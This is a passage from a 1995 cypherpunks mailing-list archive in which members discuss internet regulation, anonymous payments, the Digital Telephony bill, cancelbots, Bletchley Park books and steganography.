the anonymous, is arguably the cause for much of the economic and technological
power of the US. It is a matter for concern that, rather than help spread
this freedom to the rest of the world (as is inevitable _if_ the Internet
continues not to be 'governed'), many in and out of government are attempting
to clamp down, out of an almost primeval fear of Digital Evil that stems from
ignorance of wider issues.

>      Certainly, the current state of anarchy in national and global
> electronic networks cannot continue if the technology is to achieve
> the remarkable benefits that have been predicted in terms of
> communications among institutions and individuals, whether
> government, business or society at large.  The purpose of the

On the contrary, the 'current state of anarchy' has largely been responsible
for advancements in US research for the two decades since the Internet was
born. What is needed, perhaps, is a dialogue to improve understanding among
'society at large' of a community that is, though at present largly composed 
of technology professionals or academics, an example of multicultural and 
multinational cooperation and tolerance that would be nice to see in, say,
Los Angeles, or elsewhere in the 'real world'.

> George B. Trubow, Professor of Law
> Director, Center for Informatics Law
> The John Marshall Law School
> 315 S. Plymouth Ct.
> Chicago, IL 60604-3907
> Fax: 312-427-8307; Voice: 312-987-1445
> E-mail: 7trubow@jmls.edu

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 3 Jan 95 17:48:13 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <9501040140.AA27685@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:16 AM 1/3/95 -0500, Robert Hettinga wrote:

>Hmmm. What if you produced a pseudonym card *with* your picture on the
>front?  I smell a market opportunity. Or not...

You'd need to promenently state on the front "not to be used for id" or some 
such.  Otherwise you could potentially get nailed for issuing fraudulent 
identity documents.  Too many places think that a MC/Visa is a form of id.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Tue, 3 Jan 95 17:48:08 PST
To: Hal <cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <9501040140.AB27685@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:45 AM 1/3/95 -0800, Hal wrote:
> ... As I wrote, banks are
>required to get SS#'s for depositers right now, and I wouldn't expect
>that to change any time soon.  If anything, the trend appears to be
>towards more tightening rather than less.  ...

Isn't that only a requirement on interst-bearing, or potentially 
interest-bearing, accounts?  

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: VAMAGUS@delphi.com
Date: Tue, 3 Jan 95 18:16:11 PST
To: cypherpunks@toad.com
Subject: H.R.4922
Message-ID: <01HLF9W9HYG2938CN8@delphi.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

If I am digging up old info please excuse me, I haven't been able
to read the majority of mail due to the volume of, fluff, shall
we say.

For U.S. cypherpunks this is it:
H.R. 4922 "Interception of Digital and Other Communications"
passed as of October. This is the first *I* heard about it.
In short the bill requires:
" ...telecommunications carrier shall insure that it's equipment,
facilities, or services are capable of (1) expeditiosly isolating and
enabling the government, persuant to a court order or other
authorization, to intercept, to the exclusion of all other communications,
all wire and electronic communications carried by the carrier....etc.

Time for me to generate more keys!

More info available at:
ftp.eff.org     /pub/EFF/Policy/Digital_Telephony/digtel94.bill
gopher.eff.org  /1/EFF/Policy/Digital_Telephony/digtel94.bill
http.eff.org    /pub/EFF/Policy/Digital_Telephony/digtel94.bill

***************************Frenchie Sends*******************************
*      PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9  on request.     *
*         As soon as any man says of the affairs of the state          *
*    "What does it matter to me?" the state may be given up for lost.  *
*                 J.J.Rousseau - The Social Contract                   *
*   PGP info: email to mail-server@rtfm.mit.edu with first line:       *
*                 send pub/usenet/alt.security.pgp/*                   *
*****************************J. Francois********************************

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLwoD8LbmxeO+s+1xAQEuCgQAlI0vevAU7Gc1rkraQufpw+1NT9n2qSw5
DIoJvA0lS49ECiZeUOhwNql3cx6tPaOEeMeJIqkcv/PecX3wh3I2AzU2NGmNerOM
Z2HPjdoz3xO8u0wDOJbZDRlzQafzbh0RShxAlCxPQE+qspWhmtydMvRl6KtvT1T+
s/kMO5VMkQY=
=r8C+
-----END PGP SIGNATURE-----







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Tue, 3 Jan 95 22:13:21 PST
To: bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Subject: Re: Book review: Codebreakers, the Inside Story of Bletchley Park
In-Reply-To: <9501040525.AA10625@anchor.ho.att.com>
Message-ID: <199501040551.VAA12193@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


bill.stewart@pleasantonca.ncr.com +1-510-484-6204 wrote:
> 
> Another book with some insight into Bletchley Park is
> "Cloak and Gown" (I forget the author), about the relationship between
> Yale academics and the OSS, the WW2 predecessor to the CIA.

That's by Robin Winks. I have a copy, in hardback, that I found some
years back in a used book store. Lots of good stuff about the central
role Yale has played.

> Among the various Yalies who went into the OSS was James Jesus Angleton,
> who spent a lot of time at Bletchley analyzing information that might
> be useful for US Army and covert OSS activities, and trying to support
...

A friend of mine, Buddy Diamond, developer of the "NFL Challenge" PC
game of some years back, worked with James J. Angleton on a kind of
"CIA Challenge" training game. I met Buddy at the 1988 Crypto
conference, and he was the main reason I got invited to the Hackers
Conference that year (and thereafter, as is the norm). Oh, he went to
Yale, and this had a lot to do with the CIA getting in touch with him.

--Tim May


-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
408-688-5409           | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 3 Jan 95 19:04:02 PST
To: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Subject: Re: Calls for Reg. [Cypherpunks=Quick&Smart]
In-Reply-To: <Pine.3.89.9501031601.A517-0100000@nesta.pr.mcs.net>
Message-ID: <Pine.SUN.3.91.950103220134.7988C-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Nesta Stubbs wrote:

> Date: Tue, 3 Jan 1995 16:34:22 +0000
> From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
> To: Cypherpunks <cypherpunks@toad.com>
> Subject: calls for regulation
> 
> 
> 	This is pretty scary, I mean it always sat in the back of my mind 
> that they would attemt to rgulate the net, and to pass legislation and 
> all, but now that it is rearing it's head and looks like there is going 
> to be a push for it, I am actually concerned, to teh point of fear 
> almost. 

Let me blow all your horns.

Kudos to the exposure.

Just goes to support my theory that cypherpunks tend to be way ahead of 
the rest of the world in predicting political moves.

I have little doubt this one will come to a head as well.


> 
> i want to know everything          http://www.mcs.com/~nesta/home.html
> i want to be everywhere                     Nesta's Home Page        
> i want to fuck everyone in the world               &
> i want to do something that matters         /-/ a s t e zine
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 3 Jan 95 19:16:57 PST
To: VAMAGUS@delphi.com
Subject: Re: H.R.4922
In-Reply-To: <01HLF9W9HYG2938CN8@delphi.com>
Message-ID: <Pine.SUN.3.91.950103220633.7988D-100000@access1.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995 VAMAGUS@delphi.com wrote:

> Date: Tue, 03 Jan 1995 21:16:31 -0500 (EST)
> From: VAMAGUS@delphi.com
> To: cypherpunks@toad.com
> Subject: H.R.4922
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> If I am digging up old info please excuse me, I haven't been able
> to read the majority of mail due to the volume of, fluff, shall
> we say.
> 
> For U.S. cypherpunks this is it:
> H.R. 4922 "Interception of Digital and Other Communications"
> passed as of October. This is the first *I* heard about it.
> In short the bill requires:
> " ...telecommunications carrier shall insure that it's equipment,
> facilities, or services are capable of (1) expeditiosly isolating and
> enabling the government, persuant to a court order or other
> authorization, to intercept, to the exclusion of all other communications,
> all wire and electronic communications carried by the carrier....etc.
> 
> Time for me to generate more keys!


I assume you are concerned that this requires carriers to provide 
plaintext even if the end users are encrypting.  It really does not.

If you are simply concerned about mandated interception ability plain or 
cypher, it's mildly old news.

> 
> More info available at:
> ftp.eff.org     /pub/EFF/Policy/Digital_Telephony/digtel94.bill
> gopher.eff.org  /1/EFF/Policy/Digital_Telephony/digtel94.bill
> http.eff.org    /pub/EFF/Policy/Digital_Telephony/digtel94.bill
> 
> ***************************Frenchie Sends*******************************
> *      PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9  on request.     *
> *         As soon as any man says of the affairs of the state          *
> *    "What does it matter to me?" the state may be given up for lost.  *
> *                 J.J.Rousseau - The Social Contract                   *
> *   PGP info: email to mail-server@rtfm.mit.edu with first line:       *
> *                 send pub/usenet/alt.security.pgp/*                   *
> *****************************J. Francois********************************
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQCVAwUBLwoD8LbmxeO+s+1xAQEuCgQAlI0vevAU7Gc1rkraQufpw+1NT9n2qSw5
> DIoJvA0lS49ECiZeUOhwNql3cx6tPaOEeMeJIqkcv/PecX3wh3I2AzU2NGmNerOM
> Z2HPjdoz3xO8u0wDOJbZDRlzQafzbh0RShxAlCxPQE+qspWhmtydMvRl6KtvT1T+
> s/kMO5VMkQY=
> =r8C+
> -----END PGP SIGNATURE-----
> 
> 
> 
> 

073BB885A786F666 nemo repente fuit turpissimus - potestas scientiae in usu est
6E6D4506F6EDBC17 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Tue, 3 Jan 95 19:30:34 PST
To: Raph Levien <raph@netcom.com>
Subject: Re: Siegel and Lewis
In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com>
Message-ID: <Pine.SV4.3.91.950103221946.23162A-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


>    Martha Siegel is just fucked up enough that she will probably push
> for legislation regulating the nets. Congress is just fucked up that
> they might pass it.

   And if they do I will make it a definate point to do all I can to 
emigrate to the UK, the Netherlands, or somewhere else.

   This country is increasingly becoming a police state, and I've got too 
many years of life left to just passively deal with it.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Tue, 3 Jan 95 19:32:00 PST
To: "Paul J. Ste. Marie" <pstemari@erinet.com>
Subject: Re: Anonymous payment scheme
In-Reply-To: <9501040140.AB27685@eri.erinet.com>
Message-ID: <Pine.SV4.3.91.950103222122.23162B-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> I've heard of that, but I thought it was only a redundancy check to check 
> for read errors in the swiping process.

   That's why they use checksums - I have some information about the 
VISA-net authorization network (which came from Phrack) and also some 
about the actual encoding of the card, if anyone cares.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Handler <grendel@netaxs.com>
Date: Tue, 3 Jan 95 19:25:24 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: San Francisco Editorial
In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.950103221256.28053B-100000@unix3.netaxs.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Hal wrote:

> Another point re Cantor and Siegel is that there is now a service
> calling itself CancelMoose which goes through Julf's anon server in
> Finland (anon.penet.fi) to cancel spams.

	This is a common misconception. Cancelmoose[tm] doesn't use 
anon.penet.fi for cancelling spams -- she telnets directly into the NNTP 
server of a university in Norway. Strangely enough, this is the same 
university where Arnt Gulbrantsen works. Arnt, if you don't already know, 
is the Norwegian hacker who wrote the cancelbots that are being used 
against spams (Canter & Siegel's included). Cancelmoose[tm] is reachable 
through anon.penet.fi for comments, and she always lists the <naXXXXXX> 
form of the address (non-double-blinded)

> The scary thing about cancels is that some proposals have actually been
> directed at anonymous posts themselves.  Someone anonymously posted
> what purported to be a grisly transcript of the last seconds of the
> doomed Challenger crew as they fell to the ocean.  This caused a great
> hue and cry and some calls for banning anonymous posts and/or
> retroactively cancelling them.  This led to some very amusing events
> which Detweiler has chronicled in his FAQ on anonymity, the net result
> of which was that the idea was discredited.  But the emergence of
> CancelMoose is not an altogether positive event in my view.

	Dick Depew and AARM (Auto-Active Retro Moderation). He wanted to 
cancelbot any posting from anon.penet.fi in the Big Seven Usenet hierarchies.
He was promptly beaten down by the net. Feh.

-mbh-

ObCrypto: I've been working on a draft paper that puts forward a proposal 
to make Usenet articles uncancellable except by [1] the original author 
of the article or [2] the system admin who runs the NNTP server the 
article issued from. The problem with this is that it eliminates 
Cancelmoose[tm] and the other spam cancellers, who, IMHO, are Good Things.
--
Michael Handler <grendel@netaxs.com>                        Philadelphia, PA
Civil Liberty Through Complex Mathematics           s.s.y.g-l-b co-moderator
PGP Key ID FC031321  Print: 9B DB 9A B0 1B 0D 56 DA  61 6A 57 AD B2 4C 7B AF
"They like to watch everything you do / Transmitters hidden in the wall"--JD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Tue, 3 Jan 95 20:31:47 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: EVEN MORE creis for regulation
Message-ID: <Pine.3.89.9501032226.B3220-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain



Yet ANOTHER call for net regulation.  There are so many now I am hard 
pressedto keep track of them.  It appears that the media may adopt 
"regulation of the Internet" as it's next babe. Ya know how the adopted 
the Internet itself first, now watch as the entire mainstream media is 
flooded with calls for net regulation.



Bigots' Growing Use Of Computer Networks Assailed

The Simon Wiesenthal Center on 12-13-94 sent a letter to Prodigy protesting
bigots online messages of hate. Rabbi Abraham Cooper of the center decries
the growing use by hate groups. The Wiesenthal Center wants government
policing of the internet. They fear one-sided exposure of youths to white
supremacist messages. Civil libertarians and white supremacists say that
free speech should prevail. Marc Rotenburg of the Electronic Privacy Info
Center says that it's a difficult issue and that censorship and control are ver
y
inappropriate. White supremacist groups like the National Alliance and the
American Rennaisance can spread propaganda nationwide. These types of
hate groups are kept out of mainstream media and are thus short of funds.
Valerie Filds of West LA said she saw an anti latino diatribe on Prodigy that
plugged American Rennaisance of Louisville KY. She says she saw a message
that seemed to be from a white supremacist group. She says she saw one 
referring to the "Diary of Anne Frank" as a "Jewish Hoax". The Wiesenthal cente
r
wants such messages deleted. Anti-semitic comments on Prodigy in 1991
resulted in a policy prohibiting "blatant expressions of hatred". Kevin Strom,
who produces a radio show for National Alliance, said he was recently blocked
from forums on Compuserve. He said that "the system operator decided we
didn't deserve free speech."  His article "The Wisdom of Henry Ford" about the
book "The International Jew" was downloaded 120 times. Georgia Griffith of
Compuserve said "we are not oblidged to publish it for him."  There are 5 m
subscribers to commercial online services, 2 m to Prodigy, 20 m accessing
the internet.  Rabbi Cooper wants the FCC to place a cop on the internet. 
White supremacist propaganda is available on the internet. The Institute for
Historical Review's article "Frequently Asked Questions about National Socialis
m"
is available. Far-right activists say anonymity removes inhibitions too. The 
National Alliance uses Netcom Online Communications Services in California.
Texts and promotions of its radio show are available there. National Alliance
chairman William Pierce said "The major media in this country are very biased
against our political point of view. They present us with ridicule or in a very

distorted way. The information superhighway is much more free of censorship."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rmtodd@servalan.servalan.com (Richard Todd)
Date: Tue, 3 Jan 95 22:37:33 PST
To: hfinney@shell.portal.com
Subject: Re: San Francisco Editorial
In-Reply-To: <199501032244.OAA15281@jobe.shell.portal.com>
Message-ID: <m0rPOn0-0007GuC@servalan.servalan.com>
MIME-Version: 1.0
Content-Type: text/plain


In cypherpunks Hal Finney writes:

>Another point re Cantor and Siegel is that there is now a service
>calling itself CancelMoose which goes through Julf's anon server in
>Finland (anon.penet.fi) to cancel spams.  (Spams are off-topic,

Um, not exactly.  CancelMoose has a mailing address on the anon.penet.fi
server, for the benefit of those who wish to contact him, but the cancels
are injected elsewhere.  I don't believe anon.penet.fi lets you send 
control messages (of which cancels are a subject) thru it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 21:26:57 PST
To: gnu@toad.com
Subject: Re:  Book review: Codebreakers, the Inside Story of Bletchley Park
Message-ID: <9501040525.AA10625@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Another book with some insight into Bletchley Park is
"Cloak and Gown" (I forget the author), about the relationship between
Yale academics and the OSS, the WW2 predecessor to the CIA.

Among the various Yalies who went into the OSS was James Jesus Angleton,
who spent a lot of time at Bletchley analyzing information that might
be useful for US Army and covert OSS activities, and trying to support
counterintelligene work by correlating the information from intercepts
of German understanding of US and British plans with the Allied
sources and users of those plans, to try to find leaks, traitors,
moles, spies, and other types that counter-spook spooks worry about.

Besides the Enigma interceptions themselves, the big secret the OSS
and British intelligence were paranoid about protecting was that all the 
known German spies in Great Britain had been caught and 
turned for disinformation use (or killed); almost everything Germany
was getting from its spies was bogus.

		Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 3 Jan 95 22:02:05 PST
To: cypherpunks@toad.com
Subject: Re: SAN FRANCISCO EDITORIAL
Message-ID: <199501040602.AA11010@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



The scandalous Finland anonymous remailer is also used for good.
The Samaritans, an organization in England devoted to helping
folks who are thinking of suicide, often receives notes filtered
through it. 

If someone sends me the right address, I'll send a letter to the 
Comical explaining this politely. 

We should stress the strength of anonymity.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 04:25:18 PST
To: cypherpunks@toad.com
Subject: 3D TV and crypto
Message-ID: <gate.Fo5Dyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



This just might have a crypto app ;-)

Just saw a BBC WSTV report on a 3D TV developed in the UK. Unlike other
extremely expensive 3D TVs based on laser-holograms, this one has an ordinary
hi-def screen, pointing upwards. A beam splitter crosses the screen at an
angle, and reflectors is above and to the side, so the image actually forms
as an intersection of three beams in mid-air. A profile view:

               vvvvvvvvvv     <--- reflects down
                 v ^   /<
   image    <  < v ^ /< < 
   forms         v /> > <     <--- reflects left
   here     <  < / ^< < <
   mid-air     /   ^    <
               ^^^^^^^^^^     <--- TV image is formed here, facing up
               
The company says 'affordable' models could appear next year.

ObCrypto: Suppose the reflector(s) is another TV, displaying a moving-image
'key'? The main TV image could be 'encrypted' by subtracting the 'key' from
itself... Voila! And there's more... Suppose the 'key' is light passed through
a human hand...

Oh you though the first e-mail from a head of state was from Sweden? Queen
Elizabeth II sent one in the 70s - according to a wonderful episode of BBC's
Tomorrow's World, which did a cyberspace episode that included a sort-of
solution to the travelling salesman problem by BT physicists using evolutionary
algorithms! The episode DID NOT MENTION CHILD PORNOGRAPHY!!!!

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 22:53:32 PST
To: bmorris@netcom.com
Subject: Re: Anonymous payment scheme
Message-ID: <9501040637.AA11348@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> HH> So, you may be able to have a form of anonymity from the person you ar
> HH> transacting with, but I don't think you can be anonymous from the bank
> HH> and from the government.  And personally, I am more concerned about th
> With a debit card you can't be anonymous, because your money resides in
> the bank.  With digital cash, and the ability to transfer money to
> another digital cash card via phone lines, I don't see how they can
> successfully trace everything.  They will try, no doubt.

I thought the origination of this thread was a hypothetical proposal
to start a Cypherpunks Bank which would join Visa and issue debit cards;
they could be started for cash, under pseudonyms, and would expire
when they ran dry.  So you and your 10,000 closest friends could
call yourselves anything you want, and the merchant would know that
Johnny Cash Foobar buys a lot of pharmaceutical manufacturing equipment, 
but doesn't know who he is.  The bank's not paying interest, so they
probably don't need SSNs until the next round of privacy-prevention laws,
and they're not using them as credit-validation tools since they're
only issuing debit cards to cash customers anyway.  Meanwhile,
it gets to hire lots of lawyers, pay Visa commissions,
and collect interest on the float.  And if you get tired of being
Johnny Cash Foobar, or don't like having your purchases correlated,
John Hancock's card can buy the motorboats and Joe Toshiba's
can pay for the precision machine tools...

The standard merchant contract with Visa/Mastercharge used to forbid
merchants from asking for additional ID unless they suspected fraud;
I think some states have made laws about this as well.

	Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 22:53:36 PST
To: jamesd@netcom.com
Subject: Re: Exporting cryptographic materials, theory vs. practice
Message-ID: <9501040641.AA11386@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


James Donald writes:
> On Mon, 2 Jan 1995, Carol Anne Braddock wrote:
> > Right now, I don't think U.S. Customs is going to ask you if you
> > have PGP in your PC if you leave the country, or return either.
> > 
> > They should, and I'd be proud to say yes.
> 
> Well Carol, I am sure your heart is in the right place, but I
> do not agree.
> 
> They should not, and I'd be deranged to say yes.

Of course you'd be deranged to say yes, but just imagine what
would happen if every Customs Thug were required to ask everyone
carrying a PC into our out of the country if they had any software
on it capable of protecting the privacy of their files or communications,
and requiring major paperwork of anyone who said yes....
the law would be gone in a week.

My latest beef with the customs thugs was when I last came back from
Mexico, I noticed that their arm badges said something about like
	"U.S. Customs Service - Protectors of Independence"
Arrrgh!


			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com (bill.stewart@pleasantonca.ncr.com +1-510-484-6204)
Date: Tue, 3 Jan 95 22:53:38 PST
To: cypherpunks@toad.com
Subject: Art and Crypto - Re: I'm back. :)
Message-ID: <9501040652.AA11466@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Lile Elam writes
> I finally got back on cypherpunks. Have been incredibly busy
> but wanted to keep intouch as several artist friends of mine
> want to start using art as a encryption vehicle... Should be fun...

It works on so many levels, as well 
- hiding encrypted bits in the low-order bits of pixel color values
- representing data in the colored spots on a Seurat impressionist work
	or the lines and splotches on a Jackson Pollack imitation
- wondering what the artist _really meant_ by a given figure :-)

It also may be a good way to nag us into doing stealthy versions
of PGP and other cryptosystem headers - steganography is less useful
when the encrypted message always starts off with
- ----- BEGIN PGP ENCRYPTED FILE 
and has the recipient's keyid readily findable as well.

			Bill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Sat, 7 Jan 95 04:24:43 PST
To: cypherpunks@toad.com
Subject: Information highways, oceans and islands
Message-ID: <gate.sT8Dyc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain



Electric Dreams #42 examines the notion of distance in and out of cyberspace,
and debunks the information highway as a metaphor. Send a blank message with
a command in the Subject: line of the header, for more info. 'get dreams-42'
(without quotes) for a copy of the article; 'get index' for an index of those
so far; and 'subscribe' to receive 5 kbytes every week.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Wed, 4 Jan 95 02:37:13 PST
To: gnu@toad.com
Subject: Re: Cloak and Gown
In-Reply-To: <9501040525.AA10625@anchor.ho.att.com>
Message-ID: <9501041037.AA11018@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


> Another book with some insight into Bletchley Park is
> "Cloak and Gown" (I forget the author),

"Use the source, Luke!"

% telnet locis.loc.gov

         L O C I S :  LIBRARY OF CONGRESS INFORMATION SYSTEM

          To make a choice: type a number, then press ENTER


  1   Library of Congress Catalog           4   Braille and Audio

  2   Federal Legislation                   5   Organizations

  3   Copyright Information                 6   Foreign Law

...

b cloak and gown
To choose from list, see examples at bottom.                      FILE: LOCI
Terms alphabetically close to:CLOAK AND GOWN

B01 Cloak & gown//(TITL=3)
B02 Cloak and dagger//(TITL=3)
B03 Cloak and dagger fiction//(TITL=2)
B04 Cloak and Dagger in Predator and Prey//(TITL=1)
B05 Cloak and gavel//(TITL=1)
B06+Cloak and gown//(TITL=3)
B07 Cloak for the dreamer//(TITL=1)
B08 Cloak of Aesir//(TITL=1)
B09 Cloak of competence//(TITL=1)
B10 Cloak of consciousness//(TITL=1)
B11 Cloak of darkness//(TITL=2)
B12 Cloak of friendship//(TITL=1)

---EXAMPLES: s b6         (SELECTs line b6; creates a SET for each term type)
             f b6-b8/b10  (FINDs b6-b8 and b10; combines sets, displays result)
             r b6         (RETRIEVEs term on b6; searches text in some files)
             r subj=b6    (RETRIEVEs term type specified; e.g., SUBJ, TITL)

f b1/b6

ITEMS 1-3 OF 3                 SET 3: BRIEF DISPLAY                FILE: LOCI
                                (DESCENDING ORDER)
1. 88-672288: Winks, Robin W.  Cloak and gown : scholars in America's secret
     war /  London : Collins Harvill, 1987.  607 p. ; 24 cm.
     NOT IN LC COLLECTION
2. 88-30560: Winks, Robin W.  Cloak & gown : scholars in the secret war,
     1939-1961 /  New York : Quill, 1988.  p. cm.
     CIP - NOT YET IN LC
3. 87-7683: Winks, Robin W.  Cloak & gown : scholars in the secret war,
     1939-1961 /  1st ed.  New York : Morrow, c1987.  607 p., [16] p. of
     plates : ill., ports. ; 25 cm.
     LC CALL NUMBER: JK468.I6 W48 1987





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 06:26:22 PST
To: raph@netcom.com (Raph Levien)
Subject: Re: Siegel and Lewis
In-Reply-To: <199501040022.QAA21291@netcom17.netcom.com>
Message-ID: <9501041424.AA25564@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain



Why is it that so many cypherpunks like the economist?

I learned recently that Eric is a big fan. So am I. You're certainly 
not the first other cypherpunk to mention this. Weird. I mean, it's
not exactly a radical publication... it just gets its *&#$*#$ facts
right. Probably this is it.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nesta Stubbs <nesta@nesta.pr.mcs.net>
Date: Wed, 4 Jan 95 06:09:12 PST
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950103221946.23162A-100000@xcalibur>
Message-ID: <Pine.3.89.9501040854.A3895-0100000@nesta.pr.mcs.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Jan 1995, Jonathan Cooper wrote:

> >    Martha Siegel is just fucked up enough that she will probably push
> > for legislation regulating the nets. Congress is just fucked up that
> > they might pass it.
> 
>    And if they do I will make it a definate point to do all I can to 
> emigrate to the UK, the Netherlands, or somewhere else.
> 
>    This country is increasingly becoming a police state, and I've got too 
> many years of life left to just passively deal with it.

uhm Jon, it seems that emigrating would be passively dealing with it, 
kinda contradicting your statement that you re too young to just 
passively deal with it.


i want to know everything          http://www.mcs.com/~nesta/home.html
i want to be everywhere                     Nesta's Home Page        
i want to fuck everyone in the world               &
i want to do something that matters         /-/ a s t e zine




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bmorris@netcom.com (Bob MorrisG)
Date: Wed, 4 Jan 95 08:52:49 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.NXT.3.91.950103080014.28792B-100000@kisa>
Message-ID: <199501041652.IAA22982@netcom7.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


